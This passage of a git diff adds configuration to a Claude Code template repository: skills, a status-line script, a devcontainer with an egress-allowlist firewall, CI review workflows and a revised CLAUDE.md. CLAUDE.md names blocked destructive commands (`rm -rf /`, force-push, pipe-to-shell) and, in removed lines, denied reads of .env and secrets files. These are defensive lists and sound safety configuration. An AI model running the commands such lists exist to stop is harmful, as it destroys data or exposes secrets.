+- [ ] Every new endpoint has an error shape matching the project convention
+- [ ] Request and response schemas are documented (OpenAPI / schema file)
+- [ ] Listed breaking changes are intentional and versioned
+- [ ] Pagination on anything returning a list
+- [ ] Rate limits in place for write endpoints
+- [ ] Idempotency key support for side-effecting POSTs

--- a/.claude/skills/performance-audit/SKILL.md
+++ b/.claude/skills/performance-audit/SKILL.md
@@ -1,0 +1,80 @@
+---
+name: performance-audit
+description: Activates when investigating performance issues, profiling, or optimizing hot paths. Focuses on measurement before optimization and common footguns per language.
+allowed-tools: Read, Grep, Glob, Bash
+---
+
+# Performance Audit Skill
+
+You profile before you optimize. "This might be slow" is not evidence.
+"This p99 is 400ms and the budget is 100ms" is.
+
+## Order of operations
+
+1. **Reproduce with a representative workload.** Synthetic microbenchmarks
+   lie. Prefer shadowing production traffic or replaying a recent hour.
+2. **Measure.** Pick one of:
+   - Flamegraph (pyspy, 0x, pprof, Chrome DevTools Performance)
+   - Sampling profiler (sentry profiling, perf, Instruments)
+   - Logged timing per span (OpenTelemetry)
+3. **Identify the bottleneck** — usually one of:
+   - N+1 queries (most common)
+   - Sync I/O in a tight loop
+   - Missing index on a hot query
+   - Serialization cost (JSON.stringify on giant objects)
+   - GC pressure from allocating in a hot path
+4. **Fix, then re-measure.** Always compare numbers. If the fix doesn't
+   move the metric, revert — you introduced complexity for nothing.
+
+## Common footguns
+
+### Database
+- N+1 is the #1 cause of latency regressions. Look for `for (const x of items) await db.find(...)`.
+- Missing indexes on columns used in `WHERE` / `ORDER BY` / `JOIN ... ON`.
+- `SELECT *` when the caller uses 2 fields.
+- Connection pool exhaustion: long-held connections in async code.
+- Unused indexes costing writes.
+
+### Node.js
+- `JSON.parse` on huge payloads blocks the event loop — stream instead.
+- Regex with catastrophic backtracking on user input.
+- `Array.prototype.filter().map().reduce()` chains allocating intermediate arrays in hot paths.
+- Synchronous `fs.readFileSync` in request handlers.
+
+### Python
+- `requests` without a connection pool → new TCP handshake every call.
+- Pydantic v1 validation on wide payloads; v2 is ~10x faster.
+- GIL contention: CPU-bound work needs multiprocessing, not threads.
+
+### Frontend
+- Re-renders from unmemoized props / new object literals on every render.
+- Bundle size: audit with `source-map-explorer` / `rollup-plugin-visualizer`.
+- Waterfalls: serial `await fetch` chains that could be `Promise.all`.
+- Images not sized / not lazy-loaded.
+
+## Output
+
+Every perf investigation ends with a one-pager:
+
+```
+## Perf investigation: <endpoint / operation>
+
+### SLO / budget
+p99 should be <100ms. Currently 420ms.
+
+### Root cause
+N+1 query in `listOrders` — one SELECT per order for the customer record.
+
+### Evidence
+- Flamegraph shows 72% of time in `db.customer.findUnique`.
+- 50 orders × ~8ms per query = 400ms.
+
+### Fix
+Join customer in the initial query, or batch via dataloader.
+
+### Expected impact
+p99 → ~40ms (one query, ~15ms).
+
+### Follow-ups
+- Add a p99 alert at 150ms so this is caught earlier next time.
+```

--- a/.claude/skills/test-writing/SKILL.md
+++ b/.claude/skills/test-writing/SKILL.md
@@ -1,0 +1,70 @@
+---
+name: test-writing
+description: Activates when writing, modifying, or discussing tests. Enforces testing discipline - tests must fail for the right reason, isolate the unit under test, and cover edge cases.
+allowed-tools: Read, Grep, Glob, Bash(npm test:*), Bash(pytest:*), Bash(go test:*), Edit, Write
+---
+
+# Test Writing Skill
+
+You write tests that would pass code review at a senior engineer's desk.
+
+## Principles
+
+1. **Every test must be able to fail.** If mutating the code under test
+   doesn't break the test, the test is worthless.
+2. **Isolate the unit.** Stub external services and the clock, not internal
+   collaborators. Integration tests are different from unit tests — be
+   explicit about which you are writing.
+3. **Arrange–Act–Assert.** One act per test. Multiple asserts OK if they
+   describe one behavior.
+4. **Name tests as specifications.** `it('retries 3x on 500')` beats
+   `it('works')`.
+5. **Cover the boundary.** Empty input, null, max length, unicode, timezone,
+   concurrent calls, error from dependency.
+6. **No shared mutable state between tests.** Reset fixtures in beforeEach.
+
+## What to flag when you see it
+
+- Tests that pass by asserting on mocked return values — they're tautological.
+- `expect(true).toBe(true)` or `expect(fn).not.toThrow()` as the only assert.
+- Snapshot tests where the snapshot covers everything — the test will
+  pass even when the behavior changes.
+- Sleep-based waits (`await sleep(100)`) — use fake timers or
+  deterministic hooks.
+- Tests that access `process.env` without setting/resetting it.
+
+## Framework idioms
+
+### Jest / Vitest
+
+```ts
+describe('RefundProcessor', () => {
+  beforeEach(() => vi.useFakeTimers());
+  afterEach(() => vi.useRealTimers());
+
+  it('schedules retry after a 429', async () => {
+    const stripe = { refunds: { create: vi.fn().mockRejectedValueOnce({ status: 429 }) } };
+    const processor = new RefundProcessor(stripe);
+    const p = processor.refund('ch_1', 1000);
+    await vi.advanceTimersByTimeAsync(1000);
+    expect(stripe.refunds.create).toHaveBeenCalledTimes(2);
+  });
+});
+```
+
+### Pytest
+
+```python
+def test_refund_retries_on_429(stripe_client, fake_clock):
+    stripe_client.refunds.create.side_effect = [StripeRateLimit(), {"id": "re_1"}]
+    processor = RefundProcessor(stripe_client, clock=fake_clock)
+    result = processor.refund("ch_1", 1000)
+    fake_clock.advance(1)
+    assert stripe_client.refunds.create.call_count == 2
+    assert result["id"] == "re_1"
+```
+
+## When reviewing tests
+
+Run `git diff` on the test file and ask: if I reverted the production
+change this test was written for, would this test fail? If no — rewrite.

--- a/.claude/statusline/README.md
+++ b/.claude/statusline/README.md
@@ -1,0 +1,25 @@
+# Status Line
+
+`statusline.sh` renders the one-line status shown at the bottom of the
+Claude Code CLI. It receives session context as JSON on stdin and prints
+a formatted line to stdout.
+
+Current output:
+
+```
+claude · my-repo · ⎇ main* · $0.123
+```
+
+Wired up in `.claude/settings.json`:
+
+```json
+{
+  "statusLine": {
+    "type": "command",
+    "command": ".claude/statusline/statusline.sh"
+  }
+}
+```
+
+See the [official statusline docs](https://code.claude.com/docs/en/statusline)
+for the full stdin schema.

--- a/.claude/statusline/statusline.sh
+++ b/.claude/statusline/statusline.sh
@@ -1,0 +1,50 @@
+#!/bin/bash
+# Claude Code status line.
+# Receives a JSON payload on stdin with fields like:
+#   { "model": { "id": "...", "display_name": "..." },
+#     "workspace": { "current_dir": "..." },
+#     "cost": { "total_cost_usd": 0.12, "total_duration_ms": 45000 },
+#     "session_id": "..." }
+#
+# Outputs a single line to stdout. First line is rendered; ANSI colors OK.
+
+set -euo pipefail
+
+payload="$(cat)"
+
+# Fields (with fallbacks if jq is missing or fields absent).
+if command -v jq >/dev/null 2>&1; then
+  model="$(printf '%s' "$payload" | jq -r '.model.display_name // .model.id // "claude"' 2>/dev/null || echo claude)"
+  cwd="$(printf '%s' "$payload"   | jq -r '.workspace.current_dir // "."'        2>/dev/null || echo .)"
+  cost="$(printf '%s' "$payload"  | jq -r '.cost.total_cost_usd   // 0'          2>/dev/null || echo 0)"
+else
+  model="claude"
+  cwd="$(pwd)"
+  cost="0"
+fi
+
+# Git info.
+branch=""
+dirty=""
+if git -C "$cwd" rev-parse --is-inside-work-tree >/dev/null 2>&1; then
+  branch="$(git -C "$cwd" branch --show-current 2>/dev/null || echo detached)"
+  if ! git -C "$cwd" diff --quiet 2>/dev/null || ! git -C "$cwd" diff --cached --quiet 2>/dev/null; then
+    dirty="*"
+  fi
+fi
+
+# Colors.
+C_RESET="\033[0m"
+C_BLUE="\033[34m"
+C_YELLOW="\033[33m"
+C_GREEN="\033[32m"
+C_DIM="\033[2m"
+
+dir_short="$(basename "$cwd")"
+
+printf "${C_BLUE}%s${C_RESET}" "$model"
+printf " ${C_DIM}·${C_RESET} ${C_GREEN}%s${C_RESET}" "$dir_short"
+if [ -n "$branch" ]; then
+  printf " ${C_DIM}·${C_RESET} ${C_YELLOW}⎇ %s%s${C_RESET}" "$branch" "$dirty"
+fi
+printf " ${C_DIM}·${C_RESET} ${C_DIM}\$%.3f${C_RESET}" "$cost"

--- a/.devcontainer/devcontainer.json
+++ b/.devcontainer/devcontainer.json
@@ -3,33 +3,45 @@
   "image": "mcr.microsoft.com/devcontainers/javascript-node:1-20-bullseye",
   "features": {
     "ghcr.io/devcontainers/features/git:1": {},
-    "ghcr.io/devcontainers/features/github-cli:1": {}
+    "ghcr.io/devcontainers/features/github-cli:1": {},
+    "ghcr.io/devcontainers/features/python:1": { "version": "3.12" },
+    "ghcr.io/devcontainers/features/docker-in-docker:2": {}
   },
   "customizations": {
     "vscode": {
       "extensions": [
+        "anthropic.claude-code",
         "ms-vscode.vscode-json",
-        "bradlc.vscode-tailwindcss",
         "esbenp.prettier-vscode",
+        "dbaeumer.vscode-eslint",
         "ms-python.python",
-        "ms-vscode.powershell"
+        "ms-python.vscode-pylance",
+        "charliermarsh.ruff",
+        "github.vscode-github-actions",
+        "github.vscode-pull-request-github"
       ],
       "settings": {
         "terminal.integrated.defaultProfile.linux": "zsh",
         "editor.formatOnSave": true,
         "editor.codeActionsOnSave": {
-          "source.fixAll": true
+          "source.fixAll": "explicit"
         }
       }
     }
   },
-  "forwardPorts": [3000, 8000, 8080],
+  "forwardPorts": [3000, 5173, 8000, 8080],
   "postCreateCommand": "bash .devcontainer/post-create.sh",
   "remoteUser": "node",
   "mounts": [
-    "source=claude-code-template-node_modules,target=${containerWorkspaceFolder}/node_modules,type=volume"
+    "source=claude-code-template-node_modules,target=${containerWorkspaceFolder}/node_modules,type=volume",
+    "source=${localEnv:HOME}/.claude,target=/home/node/.claude,type=bind,consistency=cached"
   ],
   "runArgs": [
-    "--init"
-  ]
-} 
+    "--init",
+    "--cap-add=NET_ADMIN",
+    "--cap-add=NET_RAW"
+  ],
+  "containerEnv": {
+    "CLAUDE_CONFIG_DIR": "/home/node/.claude"
+  }
+}

--- a/.devcontainer/init-firewall.sh
+++ b/.devcontainer/init-firewall.sh
@@ -1,0 +1,84 @@
+#!/bin/bash
+# DevContainer egress firewall.
+# Restricts outbound network to an allowlist of hosts Claude Code needs:
+# Anthropic API, GitHub, npm, PyPI, Docker Hub, Homebrew.
+#
+# Runs once at container create with CAP_NET_ADMIN. Idempotent.
+#
+# Skip by setting DISABLE_CLAUDE_FIREWALL=1 when launching.
+
+set -euo pipefail
+
+if [ "${DISABLE_CLAUDE_FIREWALL:-0}" = "1" ]; then
+  echo "[firewall] DISABLE_CLAUDE_FIREWALL=1, skipping"
+  exit 0
+fi
+
+if ! command -v iptables >/dev/null 2>&1; then
+  echo "[firewall] iptables not installed; install with 'apt-get install -y iptables' in the image"
+  exit 0
+fi
+
+if ! command -v ipset >/dev/null 2>&1; then
+  sudo apt-get update -qq
+  sudo apt-get install -y -qq ipset dnsutils
+fi
+
+ALLOWED_DOMAINS=(
+  "api.anthropic.com"
+  "claude.ai"
+  "code.claude.com"
+  "console.anthropic.com"
+  "github.com"
+  "api.github.com"
+  "raw.githubusercontent.com"
+  "objects.githubusercontent.com"
+  "codeload.github.com"
+  "registry.npmjs.org"
+  "registry.yarnpkg.com"
+  "pypi.org"
+  "files.pythonhosted.org"
+  "deb.debian.org"
+  "security.debian.org"
+  "archive.ubuntu.com"
+  "security.ubuntu.com"
+)
+
+# Create an ipset for allowed destinations.
+sudo ipset destroy claude-allow 2>/dev/null || true
+sudo ipset create claude-allow hash:ip family inet hashsize 1024 maxelem 65536
+
+for domain in "${ALLOWED_DOMAINS[@]}"; do
+  # Resolve each domain and add all IPs.
+  while IFS= read -r ip; do
+    if [[ "$ip" =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
+      sudo ipset add claude-allow "$ip" 2>/dev/null || true
+    fi
+  done < <(dig +short "$domain" A)
+done
+
+# Allow loopback and established/related.
+sudo iptables -F OUTPUT
+sudo iptables -A OUTPUT -o lo -j ACCEPT
+sudo iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
+
+# Allow DNS (needed for resolution).
+sudo iptables -A OUTPUT -p udp --dport 53 -j ACCEPT
+sudo iptables -A OUTPUT -p tcp --dport 53 -j ACCEPT
+
+# Allow only HTTPS to allow-listed destinations.
+sudo iptables -A OUTPUT -p tcp --dport 443 -m set --match-set claude-allow dst -j ACCEPT
+sudo iptables -A OUTPUT -p tcp --dport 80  -m set --match-set claude-allow dst -j ACCEPT
+
+# Drop everything else outbound.
+sudo iptables -P OUTPUT DROP
+sudo iptables -A OUTPUT -j REJECT --reject-with icmp-host-prohibited
+
+# Smoke test: Anthropic should work, a random host should not.
+if curl -sS --max-time 5 https://api.anthropic.com -o /dev/null; then
+  echo "[firewall] ✔ api.anthropic.com reachable"
+else
+  echo "[firewall] ✘ api.anthropic.com unreachable — firewall too strict"
+fi
+
+echo "[firewall] done; $(sudo ipset list claude-allow | grep -c '^[0-9]') IPs allowed"

--- a/.devcontainer/post-create.sh
+++ b/.devcontainer/post-create.sh
@@ -1,45 +1,67 @@
 #!/bin/bash
+# Post-create setup for the Claude Code Template devcontainer.
 
-# Post-create script for Claude Code Template devcontainer
-echo "Setting up Claude Code Template environment..."
+set -euo pipefail
 
-# Install zsh and oh-my-zsh for better terminal experience
-sudo apt-get update
-sudo apt-get install -y zsh curl git jq
+echo "[post-create] Setting up Claude Code Template environment..."
 
-# Install oh-my-zsh
+# Base packages.
+sudo apt-get update -qq
+sudo apt-get install -y -qq zsh curl git jq iptables ipset dnsutils ripgrep
+
+# Oh-my-zsh for a nicer terminal.
 if [ ! -d "$HOME/.oh-my-zsh" ]; then
-    sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)" "" --unattended
+  sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)" "" --unattended
 fi
 
-# Install Claude Code globally
-echo "Installing Claude Code..."
-npm install -g @anthropic-ai/claude-code
-
-# Create logs directory for hook outputs
-mkdir -p logs
-chmod 755 logs
-
-# Create scripts directory and make hook scripts executable
-mkdir -p scripts
-chmod +x scripts/*.sh 2>/dev/null || true
-
-# Set up git if not already configured
-if [ -z "$(git config --global user.name)" ]; then
-    echo "Git user not configured. You may want to run:"
-    echo "   git config --global user.name 'Your Name'"
-    echo "   git config --global user.email 'your.email@example.com'"
+# Claude Code CLI.
+echo "[post-create] Installing Claude Code CLI..."
+if ! command -v claude >/dev/null 2>&1; then
+  npm install -g @anthropic-ai/claude-code
 fi
 
-echo "Claude Code Template environment setup complete!"
-echo ""
-echo "Available features:"
-echo "   • Custom slash commands in .claude/commands/"
-echo "   • Skills (auto-triggered) in .claude/skills/"
-echo "   • Custom agents in .claude/agents/"
-echo "   • Hook examples with JSON logging in .claude/settings.json"
-echo "   • Log analysis in logs/ directory"
-echo ""
-echo "To get started:"
-echo "   1. Run 'claude' to start Claude Code"
-echo "   2. Try the custom command: /analyze-project"
+# Egress firewall (restricts outbound network to an allowlist).
+if [ -x .devcontainer/init-firewall.sh ]; then
+  echo "[post-create] Initializing egress firewall..."
+  bash .devcontainer/init-firewall.sh || echo "[post-create] firewall init skipped/failed (non-fatal)"
+fi
+
+# Make project hook scripts executable.
+chmod +x scripts/*.sh scripts/hooks/*.sh .claude/statusline/*.sh 2>/dev/null || true
+
+# Create logs directory.
+mkdir -p logs && chmod 755 logs
+
+# Git config hint.
+if [ -z "$(git config --global user.name 2>/dev/null || true)" ]; then
+  echo
+  echo "[post-create] ⚠ Git user not configured. Run:"
+  echo "   git config --global user.name 'Your Name'"
+  echo "   git config --global user.email 'your.email@example.com'"
+fi
+
+cat <<'EOF'
+
+[post-create] ✔ Setup complete.
+
+Available features:
+  • Slash commands         .claude/commands/     (/commit, /pr, /review, /debug, …)
+  • Subagents              .claude/agents/       (security-auditor, debugger, …)
+  • Skills (auto-trigger)  .claude/skills/       (code-review, test-writing, …)
+  • Output styles          .claude/output-styles/  (concise, educational, review)
+  • Status line            .claude/statusline/
+  • Hooks                  scripts/hooks/        (format-on-save, block-dangerous, …)
+  • MCP servers            .mcp.json
+  • Agent SDK starter      sdk/
+
+Get started:
+  1. Export your API key:  export ANTHROPIC_API_KEY=...
+  2. Run 'claude' to start a session.
+  3. Try '/analyze-project' or '/review'.
+
+Docs:
+  • README.md
+  • docs/best-practices.md
+  • docs/permission-modes.md
+  • docs/hooks-cookbook.md
+EOF

--- a/.github/workflows/claude-review.yml
+++ b/.github/workflows/claude-review.yml
@@ -1,0 +1,33 @@
+name: Claude Code Review
+
+on:
+  pull_request:
+    types: [opened, synchronize]
+
+jobs:
+  review:
+    runs-on: ubuntu-latest
+    permissions:
+      contents: read
+      pull-requests: write
+      id-token: write
+    steps:
+      - name: Checkout repository
+        uses: actions/checkout@v4
+        with:
+          fetch-depth: 0
+
+      - name: Automatic PR review
+        uses: anthropics/claude-code-action@v1
+        with:
+          anthropic_api_key: ${{ secrets.ANTHROPIC_API_KEY }}
+          prompt: |
+            Review this pull request. Focus on:
+            - Correctness and potential bugs
+            - Security vulnerabilities (OWASP top 10)
+            - Test coverage of the changed lines
+            - Performance regressions
+            - Clarity and naming
+
+            Post a single review comment summarizing findings,
+            prefixed by severity (CRITICAL / WARNING / NIT / PRAISE).

--- a/.github/workflows/claude.yml
+++ b/.github/workflows/claude.yml
@@ -1,0 +1,36 @@
+name: Claude Code
+
+on:
+  issue_comment:
+    types: [created]
+  pull_request_review_comment:
+    types: [created]
+  issues:
+    types: [opened, assigned]
+  pull_request_review:
+    types: [submitted]
+
+jobs:
+  claude:
+    if: |
+      (github.event_name == 'issue_comment' && contains(github.event.comment.body, '@claude')) ||
+      (github.event_name == 'pull_request_review_comment' && contains(github.event.comment.body, '@claude')) ||
+      (github.event_name == 'pull_request_review' && contains(github.event.review.body, '@claude')) ||
+      (github.event_name == 'issues' && (contains(github.event.issue.body, '@claude') || contains(github.event.issue.title, '@claude')))
+    runs-on: ubuntu-latest
+    permissions:
+      contents: write
+      pull-requests: write
+      issues: write
+      id-token: write
+    steps:
+      - name: Checkout repository
+        uses: actions/checkout@v4
+        with:
+          fetch-depth: 1
+
+      - name: Run Claude Code
+        uses: anthropics/claude-code-action@v1
+        with:
+          anthropic_api_key: ${{ secrets.ANTHROPIC_API_KEY }}
+          trigger_phrase: "@claude"

--- a/.gitlab-ci.yml
+++ b/.gitlab-ci.yml
@@ -1,0 +1,27 @@
+# Claude Code integration for GitLab CI.
+# Requires ANTHROPIC_API_KEY as a masked CI/CD variable.
+# See https://code.claude.com/docs/en/gitlab-ci-cd for the full reference.
+
+stages:
+  - review
+
+claude-review:
+  stage: review
+  image: node:20-bullseye
+  rules:
+    - if: '$CI_PIPELINE_SOURCE == "merge_request_event"'
+  before_script:
+    - npm install -g @anthropic-ai/claude-code
+  script:
+    - |
+      git fetch origin "$CI_MERGE_REQUEST_TARGET_BRANCH_NAME"
+      git diff "origin/$CI_MERGE_REQUEST_TARGET_BRANCH_NAME...HEAD" > /tmp/diff.patch
+      claude -p --output-format text --permission-mode plan \
+        "Review this MR. Flag correctness, security, and test coverage issues. Use BLOCKER/MAJOR/MINOR tags with file:line references." \
+        < /tmp/diff.patch > /tmp/review.md
+      cat /tmp/review.md
+      # Post as MR note via the GitLab API.
+      curl -sS --request POST \
+        --header "PRIVATE-TOKEN: $GITLAB_API_TOKEN" \
+        --form "body=$(cat /tmp/review.md)" \
+        "$CI_API_V4_URL/projects/$CI_PROJECT_ID/merge_requests/$CI_MERGE_REQUEST_IID/notes"

--- a/.mcp.json
+++ b/.mcp.json
@@ -1,21 +1,28 @@
 {
   "mcpServers": {
-    "github": {
-      "type": "http",
-      "url": "https://api.githubcopilot.com/mcp/",
-      "description": "GitHub integration for repository management, issues, and PRs"
-    },
     "filesystem": {
       "type": "stdio",
       "command": "npx",
-      "args": ["-y", "@anthropic/mcp-server-filesystem", "./"],
-      "description": "Enhanced filesystem operations"
+      "args": ["-y", "@modelcontextprotocol/server-filesystem", "."],
+      "description": "Sandboxed filesystem access rooted at the project directory"
     },
     "memory": {
       "type": "stdio",
       "command": "npx",
-      "args": ["-y", "@anthropic/mcp-server-memory"],
-      "description": "Persistent memory across sessions"
+      "args": ["-y", "@modelcontextprotocol/server-memory"],
+      "description": "Persistent knowledge graph memory across sessions"
+    },
+    "git": {
+      "type": "stdio",
+      "command": "npx",
+      "args": ["-y", "@modelcontextprotocol/server-git", "--repository", "."],
+      "description": "Git operations (log, diff, blame, show) via MCP"
+    },
+    "fetch": {
+      "type": "stdio",
+      "command": "npx",
+      "args": ["-y", "@modelcontextprotocol/server-fetch"],
+      "description": "Fetch and convert web content to markdown"
     }
   }
 }

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -1,257 +1,161 @@
-# Claude Code Template Project Memory
+# Claude Code Template — Project Memory
 
-## Project Overview
+## Overview
 
-This is a comprehensive Claude Code template designed for rapid prototyping and development. It includes:
+A comprehensive, opinionated Claude Code template. Designed to be installed
+as a plugin or forked as a starting point. Everything here aligns with the
+[official Claude Code docs](https://code.claude.com/docs/en/overview).
 
-- **DevContainer Support**: Full containerized development environment
-- **Custom Slash Commands**: Multiple workflow commands (commit, pr, test, lint-fix, analyze-project)
-- **Skills**: Auto-triggered contextual helpers (code-review, db-migration)
-- **Custom Agents**: Specialized task delegation (security-auditor, doc-generator)
-- **MCP Integration**: External tool connections
-- **Hook System**: Comprehensive event logging and automation
-- **Permission Rules**: Security-first defaults
-- **Analysis Tools**: Python scripts for analyzing usage patterns
-
-## Architecture
-
-### Directory Structure
+## Directory map
 
 ```
+.claude-plugin/           plugin.json + marketplace.json → makes this installable
 .claude/
-├── commands/              # Custom slash commands
-│   ├── analyze-project.md # Project structure analysis
-│   ├── commit.md          # Smart conventional commits
-│   ├── pr.md              # Pull request creation
-│   ├── test.md            # Test runner with coverage
-│   └── lint-fix.md        # Auto-fix code style
-├── skills/                # Auto-triggered contextual helpers
-│   ├── code-review/       # Activates for code reviews
-│   │   └── SKILL.md
-│   └── db-migration/      # Activates for database work
-│       └── SKILL.md
-├── agents/                # Custom AI agents
-│   ├── security-auditor.md  # Security vulnerability scanning
-│   └── doc-generator.md     # Documentation generation
-├── settings.json          # Project-level Claude settings
-└── settings.local.json.example  # Template for local settings
-
-.devcontainer/
-├── devcontainer.json      # Container configuration
-└── post-create.sh         # Setup script
-
-.mcp.json                  # MCP server configuration
-
+├── commands/             slash commands (/commit, /pr, /review, /debug, …)
+├── agents/               subagents (security-auditor, debugger, pr-reviewer, …)
+├── skills/               auto-triggered skills (test-writing, accessibility, …)
+├── output-styles/        concise, educational, review
+├── statusline/           status line script
+├── settings.json         hooks, permissions, MCP wiring (shared)
+└── settings.local.json.example  → copy to settings.local.json (gitignored)
+.devcontainer/            devcontainer + egress firewall
+.github/workflows/        claude.yml (@claude mentions) + claude-review.yml (auto-PR review)
+.gitlab-ci.yml            GitLab CI equivalent
+.mcp.json                 project-scoped MCP servers
+docs/                     mirrored condensed versions of key official docs
+sdk/                      Agent SDK starters (TypeScript + Python)
 scripts/
-├── log-hook-event.sh      # Hook logging script
-└── analyze-logs.py        # Log analysis tool
-
-logs/                      # Generated log files (gitignored)
-├── all-hooks.jsonl        # All events
-├── hooks-YYYY-MM-DD.jsonl # Daily logs
-└── {event-type}-events.jsonl  # Event-specific logs
+├── hooks/                real hook scripts (format, block-dangerous, inject-context, cost)
+├── log-hook-event.sh     JSONL event logger
+├── analyze-logs.py       log analyzer
+└── ci-review.sh          headless-mode PR review example
 ```
 
-## Features
+## Slash commands
 
-### 1. Custom Slash Commands
+| Command | Purpose |
+|---|---|
+| `/analyze-project` | Project structure overview |
+| `/commit` | Conventional commit with auto-generated message |
+| `/pr` | Open a PR with auto-generated description |
+| `/test` | Run tests with coverage |
+| `/lint-fix` | Auto-fix linter issues |
+| `/review` | Review current branch / PR via `pr-reviewer` subagent |
+| `/security-review` | Security audit of the diff via `security-auditor` |
+| `/debug` | Trace bug to root cause via `debugger` |
+| `/refactor` | Plan a refactor via `refactor-planner` |
+| `/explain` | Explain a file / symbol / concept |
+| `/doc` | Generate docs via `doc-generator` |
+| `/implement-issue` | Read a GitHub issue and implement it end-to-end |
 
-| Command | Description | Usage |
-|---------|-------------|-------|
-| `/analyze-project` | Analyze project structure | `/analyze-project [focus-area]` |
-| `/commit` | Smart conventional commits | `/commit [type] [scope]` |
-| `/pr` | Create pull request | `/pr [base-branch]` |
-| `/test` | Run tests with coverage | `/test [pattern] [--watch]` |
-| `/lint-fix` | Auto-fix code style | `/lint-fix [path]` |
+## Subagents
 
-### 2. Skills (Auto-Triggered)
+| Agent | Purpose |
+|---|---|
+| `security-auditor` | OWASP scan, secrets detection, dependency vulns |
+| `doc-generator` | README / JSDoc / TSDoc / Python docstrings / architecture |
+| `test-runner` | Run the suite, summarize failures |
+| `pr-reviewer` | End-to-end PR review with severity tags |
+| `refactor-planner` | Sequenced, reversible refactor plan |
+| `debugger` | Root cause analysis, not symptom patching |
+| `dependency-auditor` | CVEs, deprecation, license risk |
 
-Skills automatically activate based on context:
+## Skills (auto-triggered)
 
-| Skill | Triggers When |
-|-------|---------------|
-| **code-review** | Reviewing PRs, checking code quality, preparing commits |
-| **db-migration** | Working with migrations, schema changes, ORM models |
+| Skill | Triggers on |
+|---|---|
+| `code-review` | Code review / PR / pre-commit context |
+| `db-migration` | Schema changes, ORM model work |
+| `test-writing` | Writing or discussing tests |
+| `api-design` | HTTP/REST/GraphQL/RPC interface work |
+| `performance-audit` | Profiling, optimization, hot paths |
+| `accessibility` | UI work (WCAG 2.2 AA baseline) |
 
-### 3. Custom Agents
+## Hooks
 
-Invoke agents for specialized tasks:
+Configured in `.claude/settings.json`. All hooks receive the event
+payload as JSON on stdin.
 
-| Agent | Purpose | Usage |
-|-------|---------|-------|
-| **security-auditor** | Scan for vulnerabilities, secrets, OWASP issues | Proactive security reviews |
-| **doc-generator** | Generate README, API docs, JSDoc comments | Documentation tasks |
+| Event | Script | Effect |
+|---|---|---|
+| `SessionStart` | `inject-context.sh` | Injects branch + recent commits + open PRs |
+| `PreToolUse` (Bash) | `block-dangerous-bash.sh` | Blocks `rm -rf /`, force-push to main, pipe-to-shell, etc. |
+| `PostToolUse` (Edit\|Write) | `format-on-save.sh` | Runs Prettier / Ruff / gofmt / rustfmt on the edited file |
+| `Stop` | `session-cost.sh` | Prints session cost summary to stderr |
+| All events | `log-hook-event.sh` | JSONL logging for later analysis |
 
-### 4. Hook System
+See [docs/hooks-cookbook.md](docs/hooks-cookbook.md) for details.
 
-Configured hooks (in `settings.json`):
+## Permission modes
 
-| Hook Type | Purpose |
-|-----------|---------|
-| SessionStart | Initialize session, load context |
-| PreToolUse | Log before tool execution |
-| PostToolUse | Log after execution, validate edits |
-| UserPromptSubmit | Log user prompts |
-| Notification | Log system notifications |
-| Stop | Log session end |
+Default is `default` (prompts on every unlisted Bash / file write).
+Switch per session with `/mode <name>` or `--permission-mode <name>`.
 
-### 5. Permission Rules
+See [docs/permission-modes.md](docs/permission-modes.md).
 
-Security-first permission configuration:
+## MCP servers
 
-**Allowed:**
-- npm, yarn, npx commands
-- git and gh (GitHub CLI)
-- docker commands
-- File reading and common utilities
+Declared in `.mcp.json`. Opted in via `enabledMcpjsonServers` in
+`settings.json`:
 
-**Denied:**
-- Reading `.env` files
-- Reading secrets directories
-- Destructive commands (`rm -rf`)
+| Server | What it does |
+|---|---|
+| `filesystem` | Sandboxed file access rooted at project dir |
+| `memory` | Persistent knowledge graph across sessions |
+| `git` | Git log/diff/blame/show operations |
+| `fetch` | Fetch web content as markdown |
 
-### 6. MCP Integration
+## Memory
 
-Pre-configured MCP servers (in `.mcp.json`):
+Two independent systems:
 
-| Server | Purpose |
-|--------|---------|
-| github | Repository management, issues, PRs |
-| filesystem | Enhanced file operations |
-| memory | Persistent memory across sessions |
+1. **CLAUDE.md (this file)** — committed, shared, human-authored. Acts as
+   persistent system prompt.
+2. **Auto memory** at `~/.claude/projects/.../memory/` — Claude builds
+   this as it learns about the project. Not committed. Inspect/edit it
+   directly if needed.
 
-## Usage Instructions
+## DevContainer
 
-### Getting Started
+`.devcontainer/` includes:
+- Node 20 base + Python 3.12 + Docker-in-Docker
+- VS Code extensions pre-installed (Claude Code, Prettier, ESLint, Ruff, GH Actions, GH PRs)
+- `init-firewall.sh` — egress allowlist (Anthropic API, GitHub, npm, PyPI only)
+- Mounts `~/.claude` so your global settings/auto-memory persist across rebuilds
 
-#### VS Code
-1. Install Remote-Containers extension
-2. Open repository in VS Code
-3. Select "Reopen in Container" when prompted
-4. Wait for post-create script to complete setup
+Disable the firewall with `DISABLE_CLAUDE_FIREWALL=1` if you need broader
+network access (e.g. package proxies).
 
-#### Cursor
-1. Open repository in Cursor
-2. Use Cmd+Shift+P → "Dev Containers: Reopen in Container"
-3. Wait for container build and setup to complete
+## CI/CD
 
-### Using Commands
+- **GitHub Actions** (`.github/workflows/`):
+  - `claude.yml` — `@claude` mentions in issues/PRs
+  - `claude-review.yml` — automatic review on new PRs
+- **GitLab CI** (`.gitlab-ci.yml`): equivalent MR review pipeline
+- **Headless** (`scripts/ci-review.sh`): one-shot `claude -p` example
 
-```bash
-# Analyze project
-/analyze-project
-/analyze-project security
+All require `ANTHROPIC_API_KEY` in CI secrets.
 
-# Create commits
-/commit               # Auto-detect type
-/commit feat auth     # Feature in auth scope
+## Agent SDK
 
-# Create PR
-/pr                   # Default to main
-/pr develop           # PR to develop branch
+See [`sdk/`](sdk/) for TypeScript and Python starters. Use the SDK when
+the CLI isn't the right surface (long-running services, custom tools,
+embedding the agent loop in your own product).
 
-# Run tests
-/test
-/test --coverage
-/test auth.spec.ts
+## Getting started
 
-# Fix linting
-/lint-fix
-/lint-fix src/
-```
+1. Copy `.claude/settings.local.json.example` → `.claude/settings.local.json`.
+   Put your `ANTHROPIC_API_KEY` there (or use `claude /login`).
+2. Open in VS Code / Cursor and reopen in container, OR install Claude
+   Code locally and run `claude` in the repo root.
+3. Try: `/analyze-project`, then `/review` on a branch.
 
-### Using Agents
